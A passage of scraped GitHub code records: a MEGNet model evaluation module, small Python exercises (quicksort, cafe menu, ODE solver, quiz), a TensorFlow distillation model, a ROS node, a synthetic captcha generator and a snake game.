whether or not to output detailed plots (default is False)\n\n It also takes additional keyword arguments (**kwargs) for example:\n id : a string that represents the id of the model\n labels : a list of labels for the structures\n savedir : the directory to save the output files\n It uses the kwargs.get() method to get the value of the 'id' and 'labels' keys, if they don't exist, it assigns them empty string and empty list respectively.\n\n The function then separates the valid and invalid structures according to MEGNet model and calculate the mean absolute error (MAE) between \n the predictions and the actual values. 
It then saves the MAE values to a text file and if detailed_output is true it will create some \n plots using the library figrecipes and save the plots in a directory 'figs'\n\n The function returns None, it only prints the MAE values on the screen and saves the results in a file.\n Predicts using the model and then compares to actual values in plotly figure\n '''\n id = kwargs.get('id', '')\n\n structures_valid, ypred, y, labels = megnet_evaluate_structures(model, \n structures, \n targets=targets, \n scaler=scaler)\n # labels = kwargs.get('labels', ['']*len(structures))\n # labels = np.array(labels)\n\n # # have to exclude structures that dont form compatible graphs and their corresponding targets.\n # structures_valid = []\n # targets_valid = []\n # labels_valid = []\n # structures_invalid = []\n # for s, p, l in zip(structures, targets.values, labels):\n # try:\n # graph = model.graph_converter.convert(s)\n # structures_valid.append(s)\n # targets_valid.append(np.nan_to_num(\n # scaler.transform(p.reshape(1, -1))))\n # labels_valid.append(l)\n # except:\n # structures_invalid.append(s)\n # structures_valid = np.array(structures_valid)\n\n # y = np.array(targets_valid)\n # labels = np.array(labels_valid)\n # print(f\"Following invalid structures: {structures_invalid}.\")\n # ypred = model.predict_structures(structures_valid)\n # print(ypred)\n # # y_pred=y_pred.flatten()\n # y = y.squeeze()\n MAEs = mean_absolute_error(y, ypred, multioutput='raw_values')\n\n maes_text = f'MAEs mean: {MAEs.mean()}'\n savedir = kwargs.get('savedir', './')\n if not os.path.exists(savedir):\n os.mkdir(savedir)\n\n with open(savedir+'MAE_'+id+'.txt', 'w') as f:\n f.write(maes_text)\n print(maes_text)\n\n # MAEs=pd.DataFrame(MAEs.reshape(1,-1),columns=targets.columns)\n MAEs = pd.DataFrame(MAEs, index=targets.columns)\n if detailed_output:\n # Create a new directory because it does not exist\n path = './figs'\n if not os.path.exists(path):\n os.mkdir(path)\n os.chdir(path)\n histo_name = \"HISTO_MAE\"+str(id)\n pf_hist = PlotlyFig(x_title=kwargs.get('x_title', 'Expected Y'),\n y_title=kwargs.get('y_title', 'Predicted Y'),\n title=kwargs.get('title', 'Regression of model'),\n mode='offline',\n filename=histo_name+\"_top10.html\")\n MAEs_top = MAEs.sort_values(by=0, ascending=False)\n\n # MAEs=MAEs[MAEs.columns[0:10]]\n MAEs_top = MAEs_top[:10]\n pf_hist.bar(data=MAEs_top, cols=MAEs_top.index)\n\n pf_hist = PlotlyFig(x_title=kwargs.get('x_title', 'Expected Y'),\n y_title=kwargs.get('y_title', 'Predicted Y'),\n title=kwargs.get('title', 'Regression of model'),\n mode='offline',\n filename=histo_name+\"_bottom10.html\")\n MAEs_bot = MAEs.sort_values(by=0, ascending=True)\n # MAEs=MAEs[MAEs.columns[0:10]]\n MAEs_bot = MAEs_bot[:10]\n pf_hist.bar(data=MAEs_bot, cols=MAEs_bot.index)\n\n for idx, feat in enumerate(targets.columns):\n \n pf_target = PlotlyFig(x_title=kwargs.get('x_title', 'Expected Y'),\n y_title=kwargs.get('y_title', 'Predicted Y'),\n title=kwargs.get(\n 'title', 'Regression of model'),\n mode='offline',\n filename=feat+\"_\"+id+\"_pred_vs_real.html\")\n if y.ndim == 1:\n y_feat = y\n y_feat_pred = ypred\n else:\n y_feat = y[:, idx]\n y_feat_pred = ypred[:, idx]\n pf_target.xy(xy_pairs=[(y_feat, y_feat_pred), ([min(y_feat), max(y_feat)], [min(y_feat), max(y_feat)])],\n labels=labels, modes=['markers', 'lines'],\n lines=[{}, {'color': 'black', 'dash': 'dash'}], showlegends=False)\n\n os.chdir('../')\n resultsmodel={'MAE':MAEs.mean().to_numpy()[0]}\n ## now other relevant scores\n for metric in 
[correlation, cosine]:\n metric_result=np.array([metric(y[i],ypred[i]) for i in range(len(y))]).mean()\n print(metric.__name__,metric_result)\n resultsmodel[metric.__name__] = metric_result\n \n rmse_result=np.sqrt(mean_squared_error(y, ypred))\n print('RMSE:',rmse_result)\n resultsmodel['RMSE'] = rmse_result\n \n r2_result=r2_score(y, ypred, multioutput='variance_weighted')\n print('r2:',r2_result)\n resultsmodel['R2'] = r2_result\n \n yzeros=np.zeros(y.shape)\n results_rmse0=np.sqrt(mean_squared_error(y, yzeros))\n print('RMSE zero-vector:',results_rmse0)\n resultsmodel['RMSE zero-vector'] = results_rmse0\n \n return resultsmodel\n\ndef megnet_train_val_scores(model,scaler,X_train,y_train,X_test,y_test,id='MEGNetModel',savedir='./'):\n # now get MAEs\n scores_dict = megnet_regression_model(\n model, scaler, X_test, y_test, id=id+'_val', savedir=savedir)\n # getting MAE train\n train_scores_dict = megnet_regression_model(\n model, scaler, X_train, y_train,id=id+'_train', savedir=savedir) \n train_scores_dict = {f\"{k}_train\": v for k, v in train_scores_dict.items()}\n scores_dict.update(train_scores_dict)\n return scores_dict\n\ndef get_scaler(targets):\n scaler = MinMaxScaler()\n scaler.fit(targets.values)\n return scaler\n\n\ndef generate_model_scaler(df_featurized_train: pd.DataFrame,\n df_structure_train: pd.DataFrame,\n ntarget: int = None, save_model=True, id: str = '',\n **kwargs) -> Tuple[Any, Any]:\n \"\"\"\n This function takes in a dataframe of featurized training data and a dataframe of structure training data, \n along with other optional parameters.\n It returns a tuple of a trained model and the corresponding scaler.\n \"\"\"\n model = model_setup(ntarget=ntarget, **kwargs)\n # Model training\n # Here, `structures` is a list of pymatgen Structure objects.\n # `targets` is a corresponding list of properties.\n structures = df_structure_train\n targets = df_featurized_train\n # the following will scale and process the targets as well as filter valid structures\n graphs_valid = []\n targets_valid = []\n structures_invalid = []\n if kwargs.get('prev_scaler', False):\n scaler = load(open(kwargs.get('prev_scaler'), 'rb'))\n else:\n scaler = get_scaler(targets)\n\n for s, p in zip(structures, targets.values):\n try:\n graph = model.graph_converter.convert(s)\n graphs_valid.append(graph)\n # Standardize data and substitute nan to 0, that is, the mean.\n targets_valid.append(np.nan_to_num(\n scaler.transform(p.reshape(1, -1))))\n except:\n structures_invalid.append(s)\n\n # train the model using valid graphs and targets\n model.train_from_graphs(graphs_valid, targets_valid,\n batch_size=kwargs.get('batch_size', 64),\n epochs=kwargs.get('epochs', 100),\n prev_model=kwargs.get('prev_model', None)) # prev_model uses loads_weights\n if save_model:\n model.save_weights(f\"MEGNetModel{id}_weights.h5\")\n dump(scaler, open(f'MEGNetModel{id}_scaler.pkl', 'wb'))\n return (model, scaler)\n\n\ndef load_model_scaler(id: str = '',\n n_targets: int = 1 ,\n neuron_layers: Tuple[int] = (64,32,16),\n **kwargs) -> Tuple[Any, Any]:\n \"\"\"\n This function takes in an id, number of targets, a mode, and other optional parameters for loading a previously trained MEGNet model and its corresponding scaler.\n It returns a tuple of the loaded model and scaler.\n \"\"\"\n n1,n2,n3=neuron_layers\n model = model_setup(ntarget=n_targets, n1=n1, n2=n2, n3=n3,\n **kwargs)\n modelpath_id = kwargs.get(\"modeldir\", \"./\")+id\n model_file=kwargs.get('model_file',f\"{modelpath_id}_weights.h5\")\n 
scaler_file=kwargs.get('scaler_file',f'{modelpath_id}_scaler.pkl')\n model.load_weights(model_file)\n try: ## if scaler not found, it will be None\n scaler = load(open(scaler_file, 'rb'))\n except:\n scaler = None\n return (model, scaler)\n\n\n__all__ = ['model_setup', 'megnet_regression_model', 'get_scaler',\n 'generate_model_scaler', 'load_model_scaler']\n","repo_name":"rogeriog/MEGNetModelTools","sub_path":"megnettools/megnet_setup_evaluate.py","file_name":"megnet_setup_evaluate.py","file_ext":"py","file_size_in_byte":13249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21151231158","text":"from service import *\nimport db\nimport service\n\nprint(\n \"\"\"\n Welcome to the QA Cafe, what would you like to do? \n 1. Create an order\n 2. Read an order\n 3. Read all Orders\n 4. Update an order\n 5. Delete an order\n 6. Delete all orders\n \"\"\"\n)\n\nprint(service.getAll())\n\ndef choice():\n choice = int(input(\"Please choose between 1 and 6: \"))\n print(choice)\n if choice == 1:\n create_record()\n elif choice == 2:\n print(\"Read an order\")\n elif choice == 3:\n print(\"Read all Orders\")\n elif choice == 4:\n print(\"Update an order\")\n elif choice == 5:\n print(\"Delete an order\")\n elif choice == 6:\n print(\"Delete all orders\")\n\n\n\ndef create_record():\n customer_name = input(\"Enter your name: \")\n drink = input(\"What drink would you like: \")\n size = input(\"How big do you want your drink: \")\n extras = input(\"Would you like anything else with your drink?: \")\n price = input(\"This will cost: \")\n create(customer_name,drink,size,extras,price)\n\nchoice()\n\n\n","repo_name":"D00M3/QA-Skill-check","sub_path":"control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16444487052","text":"def quick_sort(a_list):\n quick_sort_helper(a_list,0,len(a_list)-1)\n \ndef quick_sort_helper(a_list, first, last):\n if first < last:\n split_point = partition(a_list, first, last)\n \n quick_sort_helper(a_list, first, split_point-1)\n quick_sort_helper(a_list, split_point + 1, last) \n \ndef partition(a_list, first, last):\n pivot_value = a_list[first]\n \n left_mark = first + 1\n right_mark = last\n \n done = False\n while not done:\n while left_mark <= right_mark and \\\n a_list[left_mark] <= pivot_value:\n left_mark += 1\n while a_list[right_mark] >= pivot_value and \\\n right_mark >= left_mark:\n right_mark -= 1\n \n if right_mark < left_mark:\n done = True\n else:\n temp = a_list[left_mark]\n a_list[left_mark] = a_list[right_mark]\n a_list[right_mark] = temp\n \n temp = a_list[first]\n a_list[first] = a_list[right_mark]\n a_list[right_mark] = temp\n \n return right_mark\n \na_list = [54, 26, 93, 17, 77, 31, 44, 55, 20]\nquick_sort(a_list)\nprint(a_list)\n \n \n","repo_name":"arbitrarymahi/problem-solving-with-algorithms-and-data-Structures-using-python","sub_path":"QuickSort.py","file_name":"QuickSort.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"3"} +{"seq_id":"27347008704","text":"import tensorflow as tf\nimport tensorflow.keras.layers as L\nfrom .DSN_folder.DSN_LOSS import DSN_LOSS\n'''\nDA的方法采用DSN模型,原文:\nBousmalis K, Trigeorgis G, Silberman N, Krishnan D, Erhan D. \nDomain separation networks. \nAdvances in neural information processing systems. 
2016;29:343-51.\n\nL = L-task + αL-recon + βL-diff + γL-sim\nL-task这里为知识蒸馏模型的loss\n\nDSN参考了@WinChua的实现\nhttps://github.com/WinChua/CDRTR/blob/master/CDRTR/core/DeepModel/DSN/model.py\n\n'''\n\n\n\nclass A_Model:\n def __init__(self, output_dim, train_x, train_y, epochs, batch_size):\n self.tf_model = None\n self.output_dim = output_dim\n\n self.build_model()\n self.tf_model.fit(train_x, train_y, epochs=epochs, batch_size=batch_size)\n\n x = self.tf_model.get_layer(index=-2).output\n outputs = L.Softmax()(x / 3)\n\n self.a_model = tf.keras.Model(self.tf_model.input, outputs, name='A_Model')\n # self.a_model.summary()\n self.a_model.trainable = False\n\n self.a_model.compile(optimizer='adam',\n loss=tf.keras.losses.CategoricalCrossentropy(from_logits=False),\n metrics=['accuracy'])\n\n def build_model(self):\n input_tensor = tf.keras.Input(shape=(224, 224, 3), name=\"img\")\n\n tensor = input_tensor\n vgg19_layer = tf.keras.applications.vgg19.VGG19(include_top=True, \n weights='./models/vgg19_weights_tf_dim_ordering_tf_kernels.h5',\n )\n # 控制参数是否冻结\n for layer in vgg19_layer.layers:\n layer.trainable = False\n\n # (None, classes)\n tensor = vgg19_layer(tensor)\n\n layer_stack = [\n L.Dense(128, activation='relu'),\n L.Dense(128, activation='relu'),\n L.Dense(128, activation='relu'),\n L.Dense(2),\n L.Softmax()\n ]\n\n for layer in layer_stack:\n tensor = layer(tensor)\n\n self.tf_model = tf.keras.Model(inputs=input_tensor, outputs=tensor)\n # self.tf_model.summary()\n self.tf_model.compile(loss=tf.losses.sparse_categorical_crossentropy,\n optimizer='adam',\n metrics=['accuracy'])\n\n def return_model(self):\n return self.tf_model\n\n\nclass B_Model:\n def __init__(self):\n self.tf_model = None\n self.build_model()\n\n def build_model(self):\n input_tensor = tf.keras.Input(shape=(224, 224, 3), name=\"img\")\n\n tensor = input_tensor\n\n vgg19_layer = tf.keras.applications.vgg19.VGG19(include_top=True, \n weights='./models/vgg19_weights_tf_dim_ordering_tf_kernels.h5',\n )\n # 控制参数是否冻结\n for layer in vgg19_layer.layers:\n layer.trainable = False\n\n tensor = vgg19_layer(tensor)\n\n layer_stack = [\n L.Dense(128, activation='relu'),\n L.Dense(128, activation='relu'),\n L.Dense(128, activation='relu'),\n L.Dense(2),\n ]\n\n for layer in layer_stack:\n tensor = layer(tensor)\n\n self.tf_model = tf.keras.Model(inputs=input_tensor, outputs=tensor, name='B_Model')\n # self.tf_model.summary()\n self.tf_model.compile(loss=tf.losses.sparse_categorical_crossentropy,\n optimizer='adam',\n metrics=['accuracy'])\n\n def return_model(self):\n return self.tf_model\n\n# 我不确定是否需要训练encoder decoder,先写着,暂时不用\nclass Autocoder_Model:\n def __init__(self, coder_type):\n self.tf_model = None\n self.build_model()\n self.activ = 'relu' if coder_type == 'encode' else 'sigmoid' \n\n def build_model(self):\n input_tensor = tf.keras.Input(shape=(224, 224, 3), name=\"img\")\n\n tensor = tf.keras.layers.Dense(3, activation=self.activ)(input_tensor)\n\n self.tf_model = tf.keras.Model(inputs=input_tensor, outputs=tensor, name='encode_Model')\n self.tf_model.compile(loss=tf.losses.mse,\n optimizer='adam')\n\n def return_model(self):\n return self.tf_model\n\nclass DA_Distilling(tf.keras.Model):\n def __init__(self, b_model, a_model, T, alpha):\n super(DA_Distilling, self).__init__()\n self.b_model = b_model\n self.a_model = a_model\n self.T = T\n self.alpha = alpha\n\n def train_step(self, data):\n input_x, y = data\n x = input_x['target_img']\n shared_x = x\n for k, v in input_x.items(): \n if k == 'target_img':\n continue\n 
shared_x = tf.concat([v, shared_x], axis=0)\n target_len, source_len = x.shape[0], shared_x.shape[0]-x.shape[0]\n domain_labels = tf.convert_to_tensor([0 for _ in range(target_len)] + [1 for _ in range(source_len)], dtype=tf.int16)\n\n softmax = L.Softmax()\n kld = tf.keras.losses.KLDivergence()\n\n with tf.GradientTape() as tape:\n logits = self.b_model(x)\n soft_labels = self.a_model(x)\n loss_value1 = self.compiled_loss(y, softmax(logits))\n loss_value2 = kld(soft_labels, softmax(logits / self.T))\n loss_value = self.alpha * loss_value2 + (1 - self.alpha) * loss_value1\n\n # dsn = DSN_LOSS(shared_x, domain_labels, [3], [3], [3], [3], [3])\n # loss_dsn = dsn.get_dsn_loss(1e-6, 1e-5, 1e-2)\n\n # loss_value += loss_dsn\n \n grads = tape.gradient(loss_value, self.b_model.trainable_weights)\n self.optimizer.apply_gradients(zip(grads, self.b_model.trainable_weights))\n self.compiled_metrics.update_state(y, softmax(logits))\n return {'sum_loss': loss_value, 'loss1': loss_value1, 'loss2': loss_value2, }\n\n def test_step(self, data):\n input_x, y = data\n x = input_x['target_img']\n softmax = L.Softmax()\n logits = self.b_model(x)\n loss_value = self.compiled_loss(y, softmax(logits))\n\n return {'loss': loss_value}\n\n def call(self, inputs):\n print(inputs)\n exit(9)\n return self.b_model(inputs['target_img'])\n","repo_name":"FoVNull/DeepLearning-Playground","sub_path":"AbstractIMG/models/DA_VGG_KD.py","file_name":"DA_VGG_KD.py","file_ext":"py","file_size_in_byte":6204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6827339093","text":"from ode_solvers import euler_solver\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntau = 2\n# the deriative\ndef f(x, y):\n return - y / tau\n\n\n# the analytical result\ndef g(x):\n return np.exp(- x / tau)\n\n\n# different steps\nhs = [1, 0.1, 0.01]\n# the time interval on which the equation will be solved\nts = [np.arange(0, 15, h) for h in hs]\n\n\n# solve the equation on for different h\nnumerical_solutions = [euler_solver(f, t, 1) for t in ts]\n# the analycital result\nanalytical_solutions = [g(t) for t in ts]\n# compute the errors\nerrors = [np.abs((numerical_solution - analytical_solution) / analytical_solution) for numerical_solution, analytical_solution in zip(numerical_solutions, analytical_solutions)]\n\n\n# plot the numerical result\nplt.figure()\nfor i in range(3):\n plt.plot(ts[i], numerical_solutions[i], label='$h = {}$'.format(hs[i]))\nplt.title(r'Solving $N ^ {\\prime} (t) = - N(t) / \\tau$')\nplt.grid()\nplt.legend()\n# plt.show()\n\n\n# plot the error\nplt.figure()\nfor i in range(3):\n plt.plot(ts[i], errors[i], label='$h = {}$'.format(hs[i]))\nplt.title('Errors for different step size')\nplt.grid()\nplt.legend()\nplt.show()","repo_name":"Jokiva/Computational-Physics","sub_path":"lecture 12/3a.py","file_name":"3a.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"17287979668","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Twist\n \ndef callback(data):\n pub = rospy.Publisher('/turtle1/cmd_vel', Twist,queue_size=10)\n rate = rospy.Rate(10) # 10hz\n msg = Twist() \n if(data.data=='1'):\n msg.linear.x=5\n msg.angular.z=5\n else:\n msg.linear.x=0\n msg.angular.z=0\n pub.publish(msg)\n rate.sleep()\ndef listener():\n rospy.init_node('pose_turtle', anonymous=True)\n rospy.Subscriber(\"follow_flag\", String, 
callback)\n rospy.spin()\n \nif __name__ == '__main__':\n listener()\n","repo_name":"mvyp/RoboCup-Home2021","sub_path":"pose_detect/scripts/pose_turtle.py","file_name":"pose_turtle.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6323141635","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Mar 6 23:52:22 2022\r\n\r\n@author: amine gasa\r\n\"\"\"\r\nimport math\r\nimport cv2\r\nimport random\r\nimport cvzone\r\nimport numpy as np\r\nclass SnakeGameClass:\r\n def __init__(self,pathFood):\r\n self.initializeData()\r\n self.gameOver=False\r\n self.score=0\r\n # interactging with the food\r\n self.imgFood=cv2.imread(pathFood,cv2.IMREAD_UNCHANGED)\r\n self.hFood,self.wFood , _ =self.imgFood.shape #get deminsions size image\r\n \r\n def randomLocation(self):\r\n self.foodPoint=random.randint(100,300),random.randint(100,300)\r\n def initializeData(self):\r\n self.points=[] #all points of snake\r\n self.lenghts=[]#distances between each point\r\n self.currentLength=0# total lenght of the snake\r\n self.allowedLength=150\r\n self.previousHead=0,0\r\n self.foodPoint=0,0\r\n self.randomLocation()\r\n \r\n \r\n \r\n def update(self,imgMain,currentHead):\r\n \r\n if self.gameOver:\r\n cvzone.putTextRect(imgMain,\"Game Over\",[300//2,400//2],scale=3,thickness=3,\r\n offset=20)\r\n cvzone.putTextRect(imgMain,f'Your Score {self.score}',[300//2,550//2],scale=3,thickness=3,\r\n offset=20)\r\n \r\n else:\r\n cx,cy=currentHead\r\n px,py=self.previousHead\r\n self.points.append((cx,cy))\r\n distance= math.hypot(cx-px,cy-py)\r\n self.lenghts.append(distance)\r\n self.currentLength+=distance\r\n self.previousHead=cx,cy\r\n #length reduction\r\n self.reduceLength()\r\n #check if the snake ate the food\r\n rx,ry=self.foodPoint\r\n if(rx-self.wFood//2 <cx<rx+self.wFood//2 and ry-self.hFood//2\r\n <cy<ry+self.hFood//2):\r\n self.score+=1\r\n \r\n self.allowedLength+=50\r\n self.randomLocation()\r\n \r\n #draw snake\r\n if(self.points):\r\n for i,point in enumerate(self.points):\r\n if i!=0:\r\n cv2.line(imgMain,self.points[i-1],self.points[i],(0,0,255),15)\r\n cv2.circle(imgMain,self.points[-1],15,(200,0,200),cv2.FILLED)\r\n #draw dount\r\n cvzone.putTextRect(imgMain,f'Score {self.score}',[50,80],scale=3,thickness=2,\r\n offset=10)\r\n imgMain=cvzone.overlayPNG(imgMain,self.imgFood, (rx-self.wFood//2,ry-self.hFood//2))\r\n #check for collision\r\n pts=np.array(self.points[:-2],np.int32)\r\n pts=pts.reshape((-1,1,2))\r\n cv2.polylines(imgMain,[pts],False,(0,200,0),2)\r\n distace=cv2.pointPolygonTest(pts,(cx,cy),True)\r\n if(-1<=distace<=1):\r\n self.gameOver=True\r\n self.initializeData()\r\n \r\n return imgMain\r\n \r\n def reduceLength(self) :\r\n if(self.currentLength>self.allowedLength):\r\n for i, lenght in enumerate(self.lenghts):\r\n # i keep reducing form the length snake until reach the allowed length\r\n self.currentLength-=lenght\r\n self.lenghts.pop(i)\r\n self.points.pop(i)\r\n if(self.currentLength < self.allowedLength):\r\n break\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n","repo_name":"GasbaouiMohammedAlAmin/Snake-game-based-on-open-cv-and-python","sub_path":"SnakeGameClass.py","file_name":"SnakeGameClass.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"34792347754","text":"import cv2\nimport numpy as np\nimport random,string\nfrom PIL import Image\nfrom PIL import ImageFont\nfrom PIL 
import ImageDraw\n\n\nclass capcha_list():\n \"\"\"\n A generator class to create captcha image given a random seed.\n \"\"\"\n def __init__(self):\n return\n def __getitem__(self, seed,type=1):\n if type ==1:\n return capcha_gen_annotate(seed,img_h=30,img_w=100,text_length=6)\n else:\n return italic_capcha(seed, img_h=30, img_w=100, text_length=6)\n\n\n\n\ndef array2PIL(arr):\n \"\"\"\n convert np array to PIL image\n \"\"\"\n size=(arr.shape[1],arr.shape[0])\n mode = 'RGBA'\n arr = arr.reshape(arr.shape[0]*arr.shape[1], arr.shape[2])\n if len(arr[0]) == 3:\n arr = np.c_[arr, 255*np.ones((len(arr),1), np.uint8)]\n return Image.frombuffer(mode, size, arr.tostring(), 'raw', mode, 0, 1)\n\n\ndef PIL2array(img):\n \"\"\"\n Convert PIL image to np array\n \"\"\"\n return np.array(np.array(img,np.uint8)[:,:,:3])\n\n\n\ndef capcha_gen_annotate(seed,img_h=60,img_w=200,text_length=5):\n \"\"\"\n Generates a captcha with a random seed\n \"\"\"\n img_dict={}\n img_dict['height']=img_h\n img_dict['width']=img_w\n obj_list=[]\n img=np.ones((img_h,img_w,3))\n img[:]=(254,254,254)\n random.seed(seed)\n fonts=[cv2.FONT_HERSHEY_DUPLEX,cv2.FONT_HERSHEY_COMPLEX,cv2.FONT_HERSHEY_SIMPLEX,cv2.FONT_HERSHEY_TRIPLEX,cv2.FONT_ITALIC]\n lineTypes=[1,2,3]\n a=random.choice(list(range(0,254)))\n b=random.choice(list(range(0,254)))\n c=0\n color_list=[a,b,c]\n random.shuffle(color_list)\n font = random.choice(fonts)\n fontScale = random.randint(10,16)/10\n fontColor =tuple(color_list)\n lineType =random.choice(lineTypes)\n ts =[10,12,15,17,20,22,25]\n ys =[50,52,45,47,40,42,35,37,30]\n t =random.choice(ts)\n spas =[25,27,30,32,35]\n spa =random.choice(spas)\n capcha_text =''\n thick =random.choice([2,3,4])\n\n for i in range(text_length):\n obj_dict={}\n font= random.choice(fonts)\n p=t+i*spa\n y=random.choice(ys)\n char=random.choice(list(string.ascii_uppercase+string.digits))\n img=cv2.putText(img=img,text=char, org=(p,y),fontFace=font,fontScale=fontScale,color =fontColor,lineType=lineType,thickness=thick)\n textSize = cv2.getTextSize(text=char, fontFace=font, fontScale=fontScale,thickness=thick)\n obj_dict['name']=char\n obj_dict['xmin']=p\n obj_dict['ymin']=y-textSize[0][1]\n obj_dict['xmax']=p+textSize[0][0]\n obj_dict['ymax']=y\n obj_list.append(obj_dict)\n capcha_text=capcha_text+char\n img_dict['object']=obj_list\n density_noise=random.choice([100,200,150,50,300])\n for i in range(density_noise):\n x=random.choice(range(0,img_h))\n y=random.choice(range(0,img_w))\n\n bw=random.choice([2,1,3,3,2,2,1,1,4])\n bh=random.choice([2,1,3,3,2,2,1,1,4])\n x2=np.min([x+bh,img_h])\n y2=np.min([y+bh,img_w])\n darkness=random.choice([10,15,20,30,40,50])\n img[x:x2,y:y2,:]=np.zeros((x2-x,y2-y,3))+darkness\n\n noise_frac=random.choice([5,10,15])\n img=np.random.normal(loc=img,scale=(img/noise_frac)+1)\n img=np.clip(img, 0, 255)\n img=img.astype(np.uint8)\n probability=random.random()\n if probability > 0.5:\n img=cv2.GaussianBlur(img,(3,3),0)\n if 0.2< probability <=0.5:\n img=cv2.medianBlur(img,3)\n img_dict['filename']=img\n return img_dict\n\n\n\n\ndef italic_capcha(seed,img_h=30,img_w=100,text_length=6):\n \"\"\"\n Generate a italic char captcha with a random seed\n \"\"\"\n random.seed(seed)\n img_dict={}\n img_dict['height']=img_h\n img_dict['width']=img_w\n obj_list=[]\n img=np.ones((img_h,img_w,3))\n img[:]=(254,254,254)\n img=img.astype('uint8')\n back=img\n a=random.choice(list(range(0,254)))\n b=random.choice(list(range(0,254)))\n c=0\n color_list=[a,b,c]\n random.shuffle(color_list)\n fontColor 
=tuple(color_list)\n t =random.choice(list(range(8,12)))\n spa =random.choice(list(range(10,16)))\n y=random.choice(list(range(8,12)))\n capcha_text= ''\n italic_ttfs=['ttf_fonts/Raleway-Italic.ttf',\n \"ttf_fonts/BOD_I.TTF\",\n 'ttf_fonts/timesi.ttf',\n 'ttf_fonts/timesbi.ttf',\n 'ttf_fonts/SourceSansPro-SemiBoldItalic.ttf',\n 'ttf_fonts/cambriai.ttf',\n 'ttf_fonts/BOD_I.TTF',\n 'GothamLightItalic.ttf']\n fsize=random.choice(list(range(14,20)))\n font = ImageFont.truetype(random.choice(italic_ttfs), fsize)\n for i in range(text_length):\n obj_dict={}\n p=t+i*spa\n char=random.choice(list(string.ascii_uppercase+string.digits+string.ascii_lowercase))\n img=array2PIL(img)\n draw = ImageDraw.Draw(img)\n\n draw.text((p, y),char,fontColor,font=font)\n textSize=draw.textsize(char, font=font)\n img=PIL2array(img)\n obj_dict['name']=char\n obj_dict['xmin']=p\n obj_dict['ymin']=y\n obj_dict['xmax']=p+textSize[0]\n obj_dict['ymax']=y+textSize[1]\n obj_list.append(obj_dict)\n capcha_text=capcha_text+char\n img_dict['object']=obj_list\n noise_frac=random.choice([15,16,17,18])\n img=np.random.normal(loc=img,scale=(img/noise_frac)+1)\n img=np.clip(img, 0, 255)\n img=img.astype(np.uint8)\n probability=random.random()\n if probability>0.5:\n img=cv2.GaussianBlur(img,(1,1),0)\n if 0.2<probability<=0.5:\n img=cv2.medianBlur(img,1)\n img_dict['filename']=img\n return img_dict\n\n\n","repo_name":"sanjeetGupta/YoloCaptcha","sub_path":"generating_capcha.py","file_name":"generating_capcha.py","file_ext":"py","file_size_in_byte":5730,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"18693932375","text":"\r\n#make an interactive quiz with 10 questions\r\n\r\nimport random \r\n\r\n#list of questions and corresponding answers.\r\nquestions_and_answers=[{'what is 1+1?':2},\r\n {'what is 5+5?':10},\r\n {'what is 10+10?':20},\r\n {'what is 15+1?':16},\r\n {'what is 27-2?':25},\r\n {'what is 12-5?':7},\r\n {'what is 3+3?':6},\r\n {'what is 15+15?':30},\r\n {'what is 14-4?':10},\r\n {'what is 11-2?':9}]\r\n \r\n#for display purposes\r\nprint('Simple Math Quiz')\r\n\r\n#function that deals with user's name, asking/answering questions and displaying output stats.\r\ndef main():\r\n \r\n\r\n total_scores={}\r\n player=1\r\n \r\n #get player to input name\r\n while True: \r\n on=True #loop deals with invalid entry name\r\n while on:\r\n name=input('you are user no.{}. please enter your name: '.format(player))\r\n if name:\r\n print('Hi {} welcome to the quiz'. 
format(name))\r\n on=False\r\n else:\r\n print('you did not type in a name.')\r\n on=True\r\n\r\n #links to function that asks user to choose the number of questions to answer\r\n number_choice=no_of_questions()\r\n\r\n #randomly shuffles qustions so that the same questions won't get asked for user no.2.\r\n random.shuffle(questions_and_answers)\r\n\r\n #start the quiz\r\n input('Press enter to start: ') # will be able to deal with any kind of entry\r\n print() # empty space for layout effect\r\n\r\n #asks questions to user\r\n score=0\r\n got_right=[]\r\n got_wrong={} \r\n for item in questions_and_answers[0:number_choice]: #iterates through list\r\n for x,y in item.items(): #iterates through dictionary inside of list\r\n successful=True \r\n while successful: #loop deals with invalid entry types for answers\r\n try:\r\n if y==int(input('{}: '.format(x))):\r\n score+=1\r\n got_right.append(x)\r\n successful=False\r\n else: \r\n got_wrong.update({x:y}) \r\n successful=False\r\n except:\r\n print('Invalid entry, please try again.') \r\n \r\n \r\n #displays right/wrong user answers and scores \r\n total_scores.update({name:int((score/number_choice)*100)})\r\n print('you got', str(score),'/{} correct which is'.format(number_choice),\r\n int((score/number_choice)*100),'%')\r\n print('these are the questions you got right', got_right)\r\n print('these are the questions you got wrong along with their answer', got_wrong)\r\n \r\n # links to function that deals with additional users or exits quiz\r\n if multi_player()=='yes': \r\n player+=1\r\n else:\r\n break\r\n \r\n #displays overall user/users stats\r\n #displays overall scores \r\n print('these are the final scores in %', total_scores)\r\n\r\n #displays highest score:\r\n max_value=max(total_scores.values())\r\n max_key=max(total_scores, key=total_scores.get) \r\n print('highest score:', max_key, '-', max_value, '%')\r\n\r\n #dispays average value \r\n average_value=[]\r\n for y in total_scores.values():\r\n average_value.append(y)\r\n print('average value of scores:',int(sum(average_value)/len(average_value)), '%')\r\n\r\n\r\n\r\n#function that deals with multi-users \r\ndef multi_player():\r\n \r\n player_on=True \r\n while player_on: # loop deals with invalid additional user answers\r\n try:\r\n new_player=input('Is there another user who wants to take the quiz Yes/No?: ')\r\n if 